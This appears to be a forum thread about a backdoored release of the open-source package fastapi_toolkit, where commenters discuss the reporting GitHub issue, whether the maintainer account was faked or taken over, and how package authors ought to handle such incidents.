[dlor]

The issue from the researchers appears to be here: https://github.com/timaakulich/fastapi_toolkit/issues/4

This is definitely pretty strange. Account takeovers happen, but just reverting the commit and closing the issue after one gets discovered is not the best way to handle these.

This is the reality of our modern software development process though. Your threat model now must include the GitHub account of every maintainer of every open source project you use.

[louislang]

I’m the guy that opened that issue. To be clear, I’m NOT affiliated with datadog. I am co-founder of a software supply chain company https://phylum.io.

We scan all the open source packages as they’re published, and got a hit for this pretty much right away. The volume of packages that get published that are malware is astonishing…

Kind of unfortunate that these guys just closed the issue, if they aren’t malicious actors. I suspect that this is a fake account, and not an account compromise, though.

[capableweb]

In order to be a bit more constructive, what is the ideal process for the author to remove it?

The issue in general of backdoored packages is not new, but that it happened to you can be a new issue if you haven't either thought of it before or not simply encountered before. It would be very helpful if there was a resource out there answering the question "So your package was backdoored, what do you do now?" that people could refer to and get help.

[dlor]

Some kind of post-mortem or statement at all about how the GitHub account got compromised, if that's what happened here.

It could have also been a researcher checking to see if anyone would notice, or something worse.

[speedgoose]

I wouldn’t bet on an account takeover on this case.

[Alex3917]

> Your threat model now must include the GitHub account of every maintainer of every open source project you use.

But GitHub is afaik the only site on the Internet that actually does account management correctly, so it least there is that.